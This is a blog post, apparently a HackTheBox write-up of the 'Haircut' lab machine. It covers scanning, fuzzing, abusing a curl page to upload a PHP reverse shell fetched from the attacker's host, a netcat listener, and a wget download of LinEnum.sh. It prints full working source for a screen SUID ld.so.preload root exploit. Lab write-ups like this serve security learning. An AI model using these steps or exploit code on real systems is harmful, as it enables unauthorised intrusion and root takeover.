<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : r00tkieIP : 10.10.10.24[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s port with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.24
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports. let&amp;rsquo;s get a deeper scan :'><title>[18] Haircut Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/haircut-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[18] Haircut Hackthebox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : r00tkieIP : 10.10.10.24[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s port with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.24
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports. let&amp;rsquo;s get a deeper scan :'>
<meta property='og:url' content='https://example.com/posts/haircut-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-04-07T16:37:04&#43;02:00'/><meta property='article:modified_time' content='2021-04-07T16:37:04&#43;02:00'/><meta property='og:image' content='https://example.com/static/HACKING/haircut-icon.png' />
<meta name="twitter:title" content="[18] Haircut Hackthebox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : r00tkieIP : 10.10.10.24[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s port with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.24
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports. let&amp;rsquo;s get a deeper scan :"><meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content='https://example.com/static/HACKING/haircut-icon.png' />
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="has-image main-article">
    <header class="article-header">
        <div class="article-image">
            <a href="/posts/haircut-hackthebox/">
                
                    <img src="/static/HACKING/haircut-icon.png" loading="lazy" alt="Featured image of post [18] Haircut Hackthebox" />
                
            </a>
        </div>
    

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/haircut-hackthebox/">[18] Haircut Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Apr 07, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <p><img src="/static/HACKING/haircut-index.jpg" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-2---privesc" >PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Linux :penguin:
Difficulty : Medium :first_quarter_moon:
Owner : r00tkie
IP : 10.10.10.24
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>The first step is scanning machine&rsquo;s port with nmap:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;--open&#43;-T5&#43;-n&#43;10.10.10.24"  target="_blank" rel="noopener"
    >nmap -p- &ndash;open -T5 -n 10.10.10.24</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre><p>Once seen open ports. let&rsquo;s get a deeper scan :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sV&#43;-sC&#43;-sS&#43;-p22%2C80&#43;10.10.10.24"  target="_blank" rel="noopener"
    >nmap -sV -sC -sS -p22,80 10.10.10.24</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>Nothins interesting here, let&rsquo;s check the website :</p>
<p><img src="/static/HACKING/haircut-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>We can point out that the backend is <strong>php</strong>, let&rsquo;s fuzz the website :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.24/FUZZ -L &ndash;hc=404</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="o">********************************************************</span>
<span class="o">*</span> <span class="n">Wfuzz</span> <span class="m">3.1.0</span> <span class="o">-</span> <span class="n">The</span> <span class="n">Web</span> <span class="n">Fuzzer</span>                         <span class="o">*</span>
<span class="o">********************************************************</span>

<span class="n">Target</span><span class="o">:</span> <span class="n">http</span><span class="o">://</span><span class="m">10.10.10.24</span><span class="o">/</span><span class="n">FUZZ</span>
<span class="n">Total</span> <span class="n">requests</span><span class="o">:</span> <span class="m">207643</span>

<span class="o">=====================================================================</span>
<span class="n">ID</span>           <span class="n">Response</span>   <span class="n">Lines</span>    <span class="n">Word</span>       <span class="n">Chars</span>       <span class="n">Payload</span>                                                                                                                                                                   
<span class="o">=====================================================================</span>                                                                                                         
<span class="m">000000164</span><span class="o">:</span>   <span class="m">403</span>        <span class="m">7</span> <span class="n">L</span>      <span class="m">11</span> <span class="n">W</span>       <span class="m">178</span> <span class="n">Ch</span>      <span class="s">&#34;uploads&#34;</span>                                                                                                                                                                                                                                                                                                                

<span class="n">Total</span> <span class="n">time</span><span class="o">:</span> <span class="m">0</span>
<span class="n">Processed</span> <span class="n">Requests</span><span class="o">:</span> <span class="m">207643</span>
<span class="n">Filtered</span> <span class="n">Requests</span><span class="o">:</span> <span class="m">207627</span>
<span class="n">Requests</span><span class="o">/</span><span class="n">sec.</span><span class="o">:</span> <span class="m">0</span>
</code></pre></div><p>So <code>uploads</code> returns a 403 status, this means that the resource is forbidden for some reason, we&rsquo;ve seen that the backend is made with <strong>php</strong>, let&rsquo;s fuzz it again adding .php extension :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.24/FUZZ.php -L &ndash;hc=404</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="o">********************************************************</span>
<span class="o">*</span> <span class="n">Wfuzz</span> <span class="m">3.1.0</span> <span class="o">-</span> <span class="n">The</span> <span class="n">Web</span> <span class="n">Fuzzer</span>                         <span class="o">*</span>
<span class="o">********************************************************</span>

<span class="n">Target</span><span class="o">:</span> <span class="n">http</span><span class="o">://</span><span class="m">10.10.10.24</span><span class="o">/</span><span class="n">FUZZ.php</span>
<span class="n">Total</span> <span class="n">requests</span><span class="o">:</span> <span class="m">207643</span>

<span class="o">=====================================================================</span>
<span class="n">ID</span>           <span class="n">Response</span>   <span class="n">Lines</span>    <span class="n">Word</span>       <span class="n">Chars</span>       <span class="n">Payload</span>                                                                                                                                                                   
<span class="o">=====================================================================</span>
                                                        
<span class="m">000023073</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">19</span> <span class="n">L</span>     <span class="m">41</span> <span class="n">W</span>       <span class="m">446</span> <span class="n">Ch</span>      <span class="s">&#34;exposed&#34;</span>                                                                                                                                                                 

<span class="n">Total</span> <span class="n">time</span><span class="o">:</span> <span class="m">0</span>
<span class="n">Processed</span> <span class="n">Requests</span><span class="o">:</span> <span class="m">207643</span>
<span class="n">Filtered</span> <span class="n">Requests</span><span class="o">:</span> <span class="m">207629</span>
<span class="n">Requests</span><span class="o">/</span><span class="n">sec.</span><span class="o">:</span> <span class="m">0</span>
</code></pre></div><p>Let&rsquo;s check what&rsquo;s inside <code>exposed.php</code> :</p>
<p><img src="/static/HACKING/haircut-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/haircut-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>It looks like the server is running <code>curl</code> (Maybe Carrie <strong>Curl</strong> is a little hint). Let&rsquo;s try to curl our local machine, but first of all we have to set a http server :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=echo&#43;%22hello%22&#43;%3E&#43;hello.txt"  target="_blank" rel="noopener"
    >echo &ldquo;hello&rdquo; &gt; hello.txt</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server&#43;80"  target="_blank" rel="noopener"
    >python3 -m http.server 80</a></p>
</blockquote>
<p><img src="/static/HACKING/haircut-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>If we run it we can see this in our server :</p>
<p><img src="/static/HACKING/haircut-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And yeah, we&rsquo;re receiving a request from the victim machine, if we remember the <code>uploads</code> directory, could we just save our files there? Let&rsquo;s try it :</p>
<blockquote>
<p>http://10.10.14.18/hello.txt -o uploads/hello.txt</p>
</blockquote>
<p><img src="/static/HACKING/haircut-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/haircut-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Now the <code>hello.txt</code> should be uploaded inside <code>uploads</code>, let&rsquo;s check it:</p>
<p><img src="/static/HACKING/haircut-8.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice :smile: so we can upload files, in this point we can upload a php-reverse-shell to get a shell, in my case I&rsquo;ll be using <a class="link" href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php"  target="_blank" rel="noopener"
    >this one</a> :</p>
<p><img src="/static/HACKING/haircut-9.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>We edit that and as we did with <code>hello.txt</code> let&rsquo;s upload the reverse-shell :</p>
<h3 id="from-our-local-machine-">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server&#43;80"  target="_blank" rel="noopener"
    >python3 -m http.server 80</a></p>
</blockquote>
<h3 id="in-the-victim-website-">In the victim website :</h3>
<blockquote>
<p>http://10.10.14.18/php-reverse-shell.php -o uploads/shell.php</p>
</blockquote>
<p><img src="/static/HACKING/haircut-10.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And if everything has worked correctly the file should be in <code>http://10.10.10.24/uploads/shell.php</code>, first of all let&rsquo;s listen from our port 8989 with netcat :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=rlwrap&#43;nc&#43;-lvnp&#43;8989"  target="_blank" rel="noopener"
    >rlwrap nc -lvnp 8989</a></p>
</blockquote>
<p>And now let&rsquo;s go to the file :</p>
<p><img src="/static/HACKING/haircut-11.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/haircut-12.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And we’re in :sunglasses:! To get a more &ldquo;comfortable shell&rdquo; we can run this :</p>
<pre><code>python3 -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'
export SHELL=bash
export TERM=xterm-256color
stty rows 59 columns 235
</code></pre><h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<p>In my case I&rsquo;ll be using <a class="link" href="https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh"  target="_blank" rel="noopener"
    >LinEnum.sh</a>, you can also use <a class="link" href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh"  target="_blank" rel="noopener"
    >Linpeas.sh</a>. Let&rsquo;s upload it from our local machine to the victim machine :</p>
<h3 id="from-our-local-machine--1">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server&#43;80"  target="_blank" rel="noopener"
    >python3 -m http.server 80</a></p>
</blockquote>
<p><img src="/static/HACKING/haircut-13.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h3 id="from-the-victim-machine-">From the victim machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;10.10.14.18%2FLinEnum.sh"  target="_blank" rel="noopener"
    >wget 10.10.14.18/LinEnum.sh</a></p>
</blockquote>
<p><img src="/static/HACKING/haircut-14.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Now let&rsquo;s give it execute permissions and run it :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=chmod&#43;%2Bx&#43;LinEnum.sh"  target="_blank" rel="noopener"
    >chmod +x LinEnum.sh</a></p>
</blockquote>
<blockquote>
<p>./LinEnum.sh</p>
</blockquote>
<p><img src="/static/HACKING/haircut-15.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And if we read the text careflly we realize that there is a weird SUID file :</p>
<p><img src="/static/HACKING/haircut-16.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>SUID means &ldquo;Set ownser User ID up on execution&rdquo;, so we can execute screen as root, let&rsquo;s use <code>searchsploit</code> and see if we have any exploit for privesc :</p>
<p><img src="/static/HACKING/haircut-17.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s try to execute it in the victim machine (we transfere the file as we did with LinEnum.sh)</p>
<p><img src="/static/HACKING/haircut-18.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Hmm bad interpreter, so we have to use <code>dos2unix</code>, a tool used for turning DOS format text files into Unix format.</p>
<p>Let&rsquo;s try again:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=dos2unix&#43;41154.sh"  target="_blank" rel="noopener"
    >dos2unix 41154.sh</a></p>
</blockquote>
<p><img src="/static/HACKING/haircut-19.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/haircut-20.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Didn&rsquo;t work :astonished:, so this says that we&rsquo;re not being able to compile :</p>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">gcc</span><span class="o">:</span> <span class="n">error</span> <span class="n">trying</span> <span class="n">to</span> <span class="n">exec</span> <span class="s">&#39;cc1&#39;</span><span class="o">:</span> <span class="n">execvp</span><span class="o">:</span> <span class="n">No</span> <span class="n">such</span> <span class="n">file</span> <span class="n">or</span> <span class="n">directory</span>
</code></pre></div><p>Let&rsquo;s read the code first :</p>
<p><img src="/static/HACKING/haircut-21.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>We can see there 3 mini-scripts, let&rsquo;s compile the first one :</p>
<p>[+] libhax.c -&gt;</p>
<div class="highlight"><pre class="chroma"><code class="language-c" data-lang="c"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span><span class="cp">#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="cp">
</span><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span><span class="cp"></span><span class="n">__attribute__</span> <span class="p">((</span><span class="n">__constructor__</span><span class="p">))</span>
<span class="kt">void</span> <span class="n">dropshell</span><span class="p">(</span><span class="kt">void</span><span class="p">){</span>
    <span class="n">chown</span><span class="p">(</span><span class="s">&#34;/tmp/rootshell&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="n">chmod</span><span class="p">(</span><span class="s">&#34;/tmp/rootshell&#34;</span><span class="p">,</span> <span class="mo">04755</span><span class="p">);</span>
   <span class="n">unlink</span><span class="p">(</span><span class="s">&#34;/etc/ld.so.preload&#34;</span><span class="p">);</span>
   <span class="n">printf</span><span class="p">(</span><span class="s">&#34;[+] done!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div><blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=gcc&#43;-fPIC&#43;-shared&#43;-ldl&#43;-o&#43;libhax.so&#43;libhax.c"  target="_blank" rel="noopener"
    >gcc -fPIC -shared -ldl -o libhax.so libhax.c</a></p>
</blockquote>
<p><img src="/static/HACKING/haircut-22.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And now the second one :</p>
<p>[+] rootshell.c -&gt;</p>
<div class="highlight"><pre class="chroma"><code class="language-c" data-lang="c"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span><span class="cp"></span><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">){</span>
    <span class="n">setuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">setgid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">seteuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">setegid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">execvp</span><span class="p">(</span><span class="s">&#34;/bin/sh&#34;</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div><blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=gcc&#43;-o&#43;rootshell&#43;rootshell.c"  target="_blank" rel="noopener"
    >gcc -o rootshell rootshell.c</a></p>
</blockquote>
<p><img src="/static/HACKING/haircut-23.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And the last one is just a .sh script :</p>
<p>[+] get_root.sh -&gt;</p>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh"><span class="nb">echo</span> <span class="s2">&#34;[+] Now we create our /etc/ld.so.preload file...&#34;</span>
<span class="nb">cd</span> /etc
<span class="nb">umask</span> <span class="m">000</span> <span class="c1"># because</span>
screen -D -m -L ld.so.preload <span class="nb">echo</span> -ne  <span class="s2">&#34;\x0a/tmp/libhax.so&#34;</span> <span class="c1"># newline needed</span>
<span class="nb">echo</span> <span class="s2">&#34;[+] Triggering...&#34;</span>
screen -ls <span class="c1"># screen itself is setuid, so... </span>
/tmp/rootshell
</code></pre></div><p><img src="/static/HACKING/haircut-24.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s transfer all this files to the victim machine through http :smiley: :</p>
<p><img src="/static/HACKING/haircut-25.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s run <strong>get_root.sh</strong> :</p>
<p><img src="/static/HACKING/haircut-26.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="thanks-for-reading--">THANKS FOR READING 😊 !!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
